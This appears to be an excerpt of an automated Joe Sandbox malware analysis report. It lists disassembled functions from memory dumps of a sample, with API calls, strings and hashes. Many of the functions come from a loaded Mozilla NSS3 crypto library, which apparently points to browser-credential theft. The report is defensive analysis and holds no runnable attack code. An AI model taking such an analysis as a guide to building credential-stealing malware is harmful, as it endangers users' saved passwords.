Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
String ID:
API String ID: 3627164727-0
Opcode ID: 741302fe59136caf0ee5e5348d99b717b3f99c9b47bb237eee73a056d27ca055
Instruction ID: bf37c0edd98a371f08706320390e25c8d849ba25bf3959b5a76e50c580a2c2af
Opcode Fuzzy Hash: 741302fe59136caf0ee5e5348d99b717b3f99c9b47bb237eee73a056d27ca055
Instruction Fuzzy Hash: 0401547A406964FB87126BA1AD0D9DF3E6EEE4B7927042005F206D90248B6847C1CBFA

Function 6C4F7CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6C4F7CE0

Part of subcall function 6C4A9BF0: TlsGetValue.KERNEL32(?,?,?,6C4F0A75), ref: 6C4A9C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4F7D36
PR_Realloc.NSS3(?,00000080), ref: 6C4F7D6D
PR_GetCurrentThread.NSS3 ref: 6C4F7D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6C4F7DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C4F7DD8
malloc.MOZGLUE(00000080), ref: 6C4F7DF8
PR_GetCurrentThread.NSS3 ref: 6C4F7E06

Strings

:%s:%d:0x%lx, xrefs: 6C4F7DB9
NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6C4F7DF0

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: 1d303483ae17f5440c617fa7b028221382e86b650243bf45f7bdcf049edb4f5f
Instruction ID: 454d9f4d15870004d48616275010efaf68f43ac36d8027209f71e960f29acbc6
Opcode Fuzzy Hash: 1d303483ae17f5440c617fa7b028221382e86b650243bf45f7bdcf049edb4f5f
Instruction Fuzzy Hash: 5D4195B59042059FDB04CF28CC90DAB3BB6FFC4318B65456CE8298BB52D735E942CBA1

Function 0061EB72 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 108stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,?,?,00000000), ref: 0061EBAB
strchr.MSVCRT ref: 0061EBBD
strchr.MSVCRT ref: 0061EBE2
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0061ECE6,?), ref: 0061EC04
GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,0061ECE6), ref: 0061EC11
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0061ECE6,?), ref: 0061EC18
strcpy_s.MSVCRT ref: 0061EC5E

Strings

0123456789ABCDEF, xrefs: 0061EB8C
a, xrefs: 0061EB91, 0061EBB9, 0061EBD0, 0061EBEE, 0061EBBC, 0061EBE1
`Tu, xrefs: 0061EB9D

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
String ID: 0123456789ABCDEF$`Tu$a
API String ID: 453150750-3150886997
Opcode ID: 3910e9baab3474ba36b8ca02d8aa99e396d4783ec8039b24c337ef0fd5c0188a
Instruction ID: 2f7dcb2cd06e3cfea50f8a7dd2794beaefbfbb19d498335c60a7fbe4bfddbf2f
Opcode Fuzzy Hash: 3910e9baab3474ba36b8ca02d8aa99e396d4783ec8039b24c337ef0fd5c0188a
Instruction Fuzzy Hash: 8231F2769002199FDB00DFE8DD45ADEBBBAEF0A311F140168F901FB284DB75AA44CB90

Function 6C416C40 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 87COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_DigestInit), ref: 6C416C66
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C416C94
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C416CA3

Part of subcall function 6C4FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C416CB9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C416CD5

Strings

pMechanism = 0x%p, xrefs: 6C416CD0
nOl, xrefs: 6C416CF4, 6C416D1F
(CK_INVALID_HANDLE), xrefs: 6C416C9C
hSession = 0x%x, xrefs: 6C416C7E, 6C416C8E
C_DigestInit, xrefs: 6C416C61

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit$nOl
API String ID: 1003633598-214507583
Opcode ID: e77e6e12e2b0f6c2c390943248714b1c1259e5f3ec60c110d386d77271137af5
Instruction ID: 6c47cb214976a8fac0ed070a97731d12d8f65d0ce76645f952d093491a9ae7e0
Opcode Fuzzy Hash: e77e6e12e2b0f6c2c390943248714b1c1259e5f3ec60c110d386d77271137af5
Instruction Fuzzy Hash: B021A231A051149BDB10EB559D88FAA37B5EB8231DF468029E849D7F12EB30D909CBDA

Function 6C419DD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_SessionCancel), ref: 6C419DF6
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C419E24
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C419E33

Part of subcall function 6C4FD930: PL_strncpyz.NSS3(?,?,?), ref: 6C4FD963

PR_LogPrint.NSS3(?,00000000), ref: 6C419E49
PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6C419E65

Strings

nOl, xrefs: 6C419E7D, 6C419EA8
(CK_INVALID_HANDLE), xrefs: 6C419E2C
C_SessionCancel, xrefs: 6C419DF1
flags = 0x%x, xrefs: 6C419E60
hSession = 0x%x, xrefs: 6C419E0E, 6C419E1E

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel$nOl
API String ID: 1003633598-3220070467
Opcode ID: 8d6937c9e7bd8d0415b16f3efe18d50dd5db93d21ae04420bb34e3a083131481
Instruction ID: 5e68cf8290d82c33399e32256486f0805dc317dfa0486062957d7bda8a431a72
Opcode Fuzzy Hash: 8d6937c9e7bd8d0415b16f3efe18d50dd5db93d21ae04420bb34e3a083131481
Instruction Fuzzy Hash: DD21E4716052149FD700EB14DC88F6A33B5EB9270DF068029E84997F51EB319849CA96

Function 6C42ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6C42DE64), ref: 6C42ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C42ED22

Part of subcall function 6C43B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5118D0,?), ref: 6C43B095

PL_FreeArenaPool.NSS3(?), ref: 6C42ED4A
PL_FinishArenaPool.NSS3(?), ref: 6C42ED6B
PR_CallOnce.NSS3(6C542AA4,6C4412D0), ref: 6C42ED38

Part of subcall function 6C364C70: TlsGetValue.KERNEL32(?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364C97
Part of subcall function 6C364C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364CB0
Part of subcall function 6C364C70: PR_Unlock.NSS3(?,?,?,?,?,6C363921,6C5414E4,6C4ACC70), ref: 6C364CC9

SECOID_FindOID_Util.NSS3(?), ref: 6C42ED52
PR_CallOnce.NSS3(6C542AA4,6C4412D0), ref: 6C42ED83
PL_FreeArenaPool.NSS3(?), ref: 6C42ED95
PL_FinishArenaPool.NSS3(?), ref: 6C42ED9D

Part of subcall function 6C4464F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6C44127C,00000000,00000000,00000000), ref: 6C44650E

Strings

security, xrefs: 6C42ED06

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: c50766e68a3f2fe6522fdd2f7f987060fa033ada6e97b47b2e1a37b1d0e766d4
Instruction ID: 61948362aec80db7fb43a21f6e3d2faf3fd890773e07383f06ef9d09802fb6db
Opcode Fuzzy Hash: c50766e68a3f2fe6522fdd2f7f987060fa033ada6e97b47b2e1a37b1d0e766d4
Instruction Fuzzy Hash: CA113A7690021567FB10E736AC85FFB7278EF4170EF118528E844A2F81F729A51D86EB

Function 6C454DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400), ref: 6C454DCB

Part of subcall function 6C440FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C3E87ED,00000800,6C3DEF74,00000000), ref: 6C441000
Part of subcall function 6C440FF0: PR_NewLock.NSS3(?,00000800,6C3DEF74,00000000), ref: 6C441016
Part of subcall function 6C440FF0: PL_InitArenaPool.NSS3(00000000,security,6C3E87ED,00000008,?,00000800,6C3DEF74,00000000), ref: 6C44102B

PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6C454DE1

Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C4410F3
Part of subcall function 6C4410C0: EnterCriticalSection.KERNEL32(?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44110C
Part of subcall function 6C4410C0: PL_ArenaAllocate.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441141
Part of subcall function 6C4410C0: PR_Unlock.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441182
Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44119C

PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6C454DFF
SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C454E59

Part of subcall function 6C43FAB0: free.MOZGLUE(?,-00000001,?,?,6C3DF673,00000000,00000000), ref: 6C43FAC7

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C51300C,00000000), ref: 6C454EB8
SECOID_FindOID_Util.NSS3(?), ref: 6C454EFF
memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6C454F56
PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C45521A

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
String ID:
API String ID: 1025791883-0
Opcode ID: 3a8ca86027fdc5c28a1e6b79bf1c7b243074c6085874672e6192d16601abfb64
Instruction ID: 2d2187441d6ac61a857f435d90b71edb96991e7b8d9f64a1bccb34a6570b2a44
Opcode Fuzzy Hash: 3a8ca86027fdc5c28a1e6b79bf1c7b243074c6085874672e6192d16601abfb64
Instruction Fuzzy Hash: EEF18C71E002098BDB04CF58D840FADB7B2FF45359F658169E915ABB80E735E9A2CF90

Function 6C3D2D20 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 183COMMON

Download Yara Rule

APIs

__allrem.LIBCMT ref: 6C3D2D69

Strings

winTruncate2, xrefs: 6C3D2EF8
winUnmapfile1, xrefs: 6C3D2F55
winUnmapfile2, xrefs: 6C3D2F7F
@Ol, xrefs: 6C3D2E24
Ol, xrefs: 6C3D2DD0
POl, xrefs: 6C3D2E74, 6C3D2EC5, 6C3D2F32, 6C3D2F5C
winTruncate1, xrefs: 6C3D2EBE
winSeekFile, xrefs: 6C3D2E9C

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: __allrem
String ID: @Ol$POl$winSeekFile$winTruncate1$winTruncate2$winUnmapfile1$winUnmapfile2$Ol
API String ID: 2933888876-2691420137
Opcode ID: 60e662d1034aaf6cdd57d9a8b9aec984afb1378a52283242e02ffa4f134805d7
Instruction ID: 0b87cfd0673cc3ad9388484d8a099d0dd23161e317bad43673cbd972152d6bcb
Opcode Fuzzy Hash: 60e662d1034aaf6cdd57d9a8b9aec984afb1378a52283242e02ffa4f134805d7
Instruction Fuzzy Hash: CF61A072A002059FDB04CF64DD84AAA77F5FF49318F11852CE919AB780EB32AD16CF95

Function 0062D173 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0062D1A7
GetFileSize.KERNEL32(?,00000000), ref: 0062D220
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0062D23C
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0062D250
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0062D259
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0062D269
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0062D287
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0062D297

Strings

, xrefs: 0062D1F3

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: da1ca76db5249e075f7a577adea2b614552b6748402f2b1c5600d587fb4efd6a
Instruction ID: db7d249ac2f6fd5e00e02358109ae30ae93c416794224cca53ee351c6f9df48d
Opcode Fuzzy Hash: da1ca76db5249e075f7a577adea2b614552b6748402f2b1c5600d587fb4efd6a
Instruction Fuzzy Hash: 9651F371D00628EFDB28DF95EC85AEDBBBAEB45300F10442AE615E62A0D7749E458F50

Function 00620F05 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 00620F49
memmove.MSVCRT(000000FF,?,?,00000000,00000000,?), ref: 00620F98
_memmove.LIBCMT ref: 00620FBC
memmove.MSVCRT(00000000,00000000,000000FF,00000000,00000000,?), ref: 00620FF1
memmove.MSVCRT(000000FF,00000000,?,00000000,00000000,?), ref: 00621048
memmove.MSVCRT(00000000,00000000,?,?,?,?,?,?,?,?,?,00648100,00000000,0000000F,75918A60,?), ref: 0062106D
std::_Xinvalid_argument.LIBCPMT ref: 00621094

Strings

string too long, xrefs: 00620F44
invalid string position, xrefs: 0062108F

Memory Dump Source

Source File: 00000000.00000002.3128903717.0000000000611000.00000080.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true

Associated: 00000000.00000002.3128864133.0000000000610000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129062872.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129102217.000000000064E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000674000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.000000000069D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006B8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000006F6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.00000000007AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3129134842.0000000000851000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3130011109.0000000000863000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_610000_file.jbxd

Yara matches

Similarity

API ID: memmove$Xinvalid_argumentstd::_$_memmove
String ID: invalid string position$string too long
API String ID: 3430830890-4289949731
Opcode ID: f0341187b3615818ce4bcc05be2812c8da6189a6b301426ee7ab554c13530df1
Instruction ID: 6487b5b741576e90f84e654fd39090fda917442fa4af19f3e15906cba2efdb2b
Opcode Fuzzy Hash: f0341187b3615818ce4bcc05be2812c8da6189a6b301426ee7ab554c13530df1
Instruction Fuzzy Hash: 27516D30704964DBEF28CF58E98596DB7B3EB41350B24095DE892CB292CB31ADC5DF94

Function 6C3FFCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON

Download Yara Rule

APIs

PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6C3FFCBD
strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6C3FFCCC
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6C3FFCEF
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C3FFD32
PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6C3FFD46
PORT_Alloc_Util.NSS3(00000001), ref: 6C3FFD51
memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6C3FFD6D
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C3FFD84

Strings

:, xrefs: 6C3FFD78

Memory Dump Source

Source File: 00000000.00000002.3157468448.000000006C361000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C360000, based on PE: true

Associated: 00000000.00000002.3157448680.000000006C360000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157637379.000000006C53E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157659602.000000006C53F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157684733.000000006C540000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c360000_file.jbxd

Similarity

API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
String ID: :
API String ID: 183580322-336475711
Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction ID: 4e18fd8043b79ff85d4af32bbaa65a4d455bf3f1074825e3129a64aefd0ec08a
Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
Instruction Fuzzy Hash: 9431D5B2D002155BEB008AA49C41BAF77E8DF4831CF150928EC2497B04E772D91ACBE2

Function 6C3E6DB0 Relevance: 15.2, APIs: 10, Instructions: 200memoryCOMMON

Download Yara Rule

APIs

SECITEM_ArenaDupItem_Util.NSS3(?,6C3E7D8F,6C3E7D8F,?,?), ref: 6C3E6DC8

Part of subcall function 6C43FDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6C43FE08
Part of subcall function 6C43FDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6C43FE1D
Part of subcall function 6C43FDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6C43FE62

PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6C3E7D8F,?,?), ref: 6C3E6DD5

Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C4410F3
Part of subcall function 6C4410C0: EnterCriticalSection.KERNEL32(?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44110C
Part of subcall function 6C4410C0: PL_ArenaAllocate.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441141
Part of subcall function 6C4410C0: PR_Unlock.NSS3(?,?,?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C441182
Part of subcall function 6C4410C0: TlsGetValue.KERNEL32(?,6C3E8802,00000000,00000008,?,6C3DEF74,00000000), ref: 6C44119C

SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6C508FA0,00000000,?,?,?,?,6C3E7D8F,?,?), ref: 6C3E6DF7

Part of subcall function 6C43B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6C5118D0,?), ref: 6C43B095

SECITEM_ArenaDupItem_Util.NSS3(?,00000000), ref: 6C3E6E35

Part of subcall function 6C43FDF0: PORT_Alloc_Util.NSS3(0000000C,00000000,?,?), ref: 6C43FE29
Part of subcall function 6C43FDF0: PORT_Alloc_Util.NSS3(?,?,?,?), ref: 6C43FE3D
Part of subcall function 6C43FDF0: free.MOZGLUE(00000000,?,?,?,?), ref: 6C43FE6F

PORT_ArenaAlloc_Util.NSS3(?,0000005C), ref: 6C3E6E4C

